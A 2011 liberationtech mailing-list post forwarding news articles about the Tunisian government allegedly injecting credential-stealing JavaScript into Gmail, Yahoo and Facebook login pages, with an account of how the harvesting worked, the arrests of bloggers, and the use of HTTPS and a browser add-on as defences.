[liberationtech] Tunisian government hacks into gmail and Facebook accounts

Wed Jan 12 16:59:18 PST 2011

This story makes me livid. In this age of inexpensive CPU cycles and fast networks, a company like Facebook has no excuse for not protecting its users with cryptography. If you want to talk about corporate responsibility, *this* is where we start.

On Jan 12, 2011 4:33 PM, Terry Winograd <winograd at cs.stanford.edu> wrote: 

http://www.fastcompany.com/1715575/tunisian-government-hacking-facebook-gmail-anonymous

Tunisian Government Allegedly Hacking Facebook, Gmail Accounts of

Dissidents and Journalists

BY Neal UngerleiderMon Jan 10, 2011

> A strange bit of JavaScript has found its way onto Tunisian Internet users' internet login screens. Some are now in jail in a country known for torture. But they've been adopted by an unlikely ally: Anonymous.

Massive riots and protests have rocked Tunisia this past month. After

a 26-year-old street vendor named Mohammed Bouazizi attempted to kill

himself by self-immolation (he survived and later died of his burns),

hundreds of thousands took to the North African nation's streets. The

protesters complain of unemployment, economic woes, and an omnipresent

dictatorship. Tunisia's government has stumbled upon a new method of

combating the protesters: hacking into their social media accounts.

According to a report by the Committee to Protect Journalists, the

Tunisian government appears to be breaking into the Facebook, Google,

and Yahoo accounts of dissidents and journalists. Hackers with unusual

levels of access to Tunisia's state-control network infrastructure

have managed to gain access to Facebook accounts belonging to

individuals such as journalists Sofiene Chourabi of al-Tariq al-Jadid

(New Path; a newspaper affiliated with the opposition Movement

Ettajdid party) and independent video journalist Haythem El Mekki,

while gaining the passwords of others. Hack targets found that

Facebook groups they founded were deleted, as were pictures of

protests. In CPJ's words, "Their accounts and pictures of recent

protests have been deleted or otherwise compromised.” Blogs hosted on

Blogspot and elsewhere are also being targeted. Here is an excerpt

from a post by Lina Ben Mhenni of the A Tunisian Girl blog:

> Well, I can understand ... No I can't understand that some stupid person has hacked my e-mail then, my Facebook account. This stupid person has also deleted some pages in which I am an administrator. Pages like that of 7ellblog (launch a blog) which has been largely promoted even by official media, the page of the Tunisian singer Amel Mathlouthi, Reading Books is Better than Staring at others (yes they hate reading and culture uin my country), the Tunisian blogosphere, and may be a page against censorship ' la censure nuit à l 'image de mon pays' (I don't have the confirmation yet) and many other pages were deleted. What happened is so shameful because the internet police is again confirming its stupidity and useless stubbornness. Sofiene Chourabi and Azyz Amami are experiencing the same problem now. They have been hacked.

Already, in-depth information is surfacing on how the hacks were

committed. It appears that the Agence tunisienne d'Internet, a

government agency which supervises all of Tunisia's ISPs, or someone

with access to the agency committed them. Tunisian ISPs are running a

Java script that siphons off login credentials from users of Facebook,

Yahoo and Gmail. According to the Tech Herald's Steve Ragan:

> Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s Josh Abraham, broke the code down further. Crowley explained that the JavaScript is customized for each site’s login form. It will pull the username and password, and encode it with a weak crypto algorithm. The newly encrypted data is placed into the URL, and a randomly generated five character key is added. The randomly generated key is meaningless, but it is assumed that it’s there to add a false sense of legitimacy to the URL. The random characters and encrypted user information are delivered in the form of a GET request to a non working URL.

The code only targeted users accessing HTTP sites instead of HTTPS,

which appears to be why Facebook was so heavily ravaged by the hack

plan. Facebook users default to using HTTP to access the site.

Much of this information has been released to the public by the

quasi-4Chan allied Anonymous group, which has launched an

anti-Tunisian government hacker campaign called Operation: Tunisia.

Amamou was taken into police custody this past week after authorities

apparently found his location via Foursquare. His current whereabouts

are unknown.

The Agence tunisienne d'Internet has long been one of the most

censorship-happy government agencies in all of Africa. Tunisia's net

firewalls and intricate IP tracking mechanisms have been compared to

China's, while popular sites like YouTube and DailyMotion were banned

due to hosting videos alleging human rights abuses in Tunisian

prisons. In one of the WikiLeaks cables on Tunisia, an anonymous

diplomat notes endemic government corruption and refers to the

government of President-for-life Zine al-Abidine Ben Ali as a

“quasi-mafia” and a police state.”

While Facebook, Google and Yahoo have not spoken publicly on the

alleged Tunisian government hacking campaign yet, the State Department

has. In a press conference on Friday, January 7, spokesperson Philip

Crowley stated:

> We are concerned about recent reports that Tunisian ISP providers, at the direction of the government, hacked into the accounts of Tunisian users of American companies including Facebook, and providers of email such as Yahoo and Google, and stealing passwords. This kind of interference threatens the ability of civil society to realize the benefits of new technologies. Cyber intrusions of all kinds, including reported attacks on government of Tunisia websites, disrupt the free flow of information and reduce overall confidence in the reliability and security of vital information networks.

During the past week, in addition to Amamou, at least three other

members of Tunisia's hacker and blogger communities were taken into

custody by Tunisian police.

----------------------------------

http://www.thetechherald.com/article.php/201101/6651/Tunisian-government-harvesting-usernames-and-passwords

Tunisian government harvesting usernames and passwords

by Steve Ragan - Jan 4 2011, 20:08

The Tunisian Internet Agency (Agence tunisienne d'Internet or ATI) is

being blamed for the presence of injected JavaScript that captures

usernames and passwords. The code has been discovered on login pages

for Gmail, Yahoo, and Facebook, and said to be the reason for the

recent rash of account hijackings reported by Tunisian protesters.

ATI is run by the Tunisian Ministry of Communications. They supply all

of the privately held Tunisian ISPs, making them the main source of

Internet access in the country. They’ve been under scrutiny for years,

due to the fact that they make use of their authority to regulate the

entire national network. Last April, ATI earned international

attention by blocking access to sites such as Flickr, YouTube, and

Vimeo.

According to Reporters Without Borders, authorities claim to target

only pornographic or terrorist websites. “However, censorship applies

above all to political opposition, independent news, and human rights

websites.”

“When an Internet user attempts to access a prohibited website, the

following automatic error message appears: “Error 404: page not

found,” without displaying the familiar “Error 403” more typical of a

blocked site...This strategy equates to a disguised form of

censorship.”

As for the JavaScript itself, The Tech Herald has seen examples of the

embedded script during live surfing sessions with sources in Tunisia,

and in posted source code made available to the Web. The source for

the GMail injection is here, the Yahoo injection is here, and Facebook

is here.

Four different experts consulted by The Tech Herald independently

confirmed our thoughts; the embedded code is siphoning off login

credentials.

On Twitter, security researcher Gerry Kavanagh and Errata Security CTO

David Maynor told us that you can tell the code is capturing login

information by how it references the login element for the form.

“Suffice to say, the code is definitely doing something

surreptitious,” Kavanagh noted.

Daniel Crowley, Technical Specialist for Core Security, and Rapid7’s

Josh Abraham, broke the code down further. Crowley explained that the

JavaScript is customized for each site’s login form. It will pull the

username and password, and encode it with a weak crypto algorithm.

The newly encrypted data is placed into the URL, and a randomly

generated five character key is added. The randomly generated key is

meaningless, but it is assumed that it’s there to add a false sense of

legitimacy to the URL.

The random characters and encrypted user information are delivered in

the form of a GET request to a non working URL. In the Gmail example,

you see this URL listed as http://www.google.com/wo0dh3ad. Abraham

noted that the encryption makes it easy to capture usernames and

passwords that would include special characters such as ‘%’ or ‘/’.

Considering that the backbone of the Tunisian Internet is full of

state run filters and firewalls designed to block access, configuring

one to log the GET commands with the harvested data would be trivial.

But is this a government sponsored action?

The likelihood that a group of criminals compromised the entire

Tunisian infrastructure is virtually nonexistent. Code planting on

this scale could only originate form an ISP. With their history of

holding an iron grip on the Internet, ATI is the logical source of the

information harvesting.

There is an upside however, as the embedded JavaScript only appears

when one of the sites is accessed with HTTP instead of HTTPS. In each

test case, we were able to confirm that Gmail and Yahoo were only

compromised when HTTP was used. For Facebook on the other hand, the

default is access is HTTP, so users in Tunisia will need to visit the

HTTPS address manually.

Another interesting note is that it appears the embedded code has

targeted Tunisian users for several months. Slim Amamou, of the Global

Voices Advocacy blog, reported his findings on the code last July, and

at the time, ATI was blocking Google’s HTTPS port, forcing users to

default to HTTP.

The information surrounding the embedded JavaScript came to our

attention thanks to a user on the IRC server where supporters for

Anonymous’ Operation: Tunisia gathered to show support for Tunisian

protesters. When word spread of embedded code and account hijackings,

Anonymous offered Tunisian users help via Userscripts.org, with a

browser add-on that strips the added JavaScript code.

The ATI website has been offline for more than a day. The outage

started after Anonymous launched Operation: Tunisia. Our coverage on

their actions and the problems in Tunisia is here.

--

_______________________________________________

liberationtech mailing list

liberationtech at lists.stanford.edu

Should you need to change your subscription options, please go to:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

If you would like to receive a daily digest, click "yes" (once you click above) next to "would you like to receive list mail batched in a daily digest?"

You will need the user name and password you receive from the list moderator in monthly reminders.

Should you need immediate assistance, please contact the list moderator.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20110112/9e207295/attachment.html>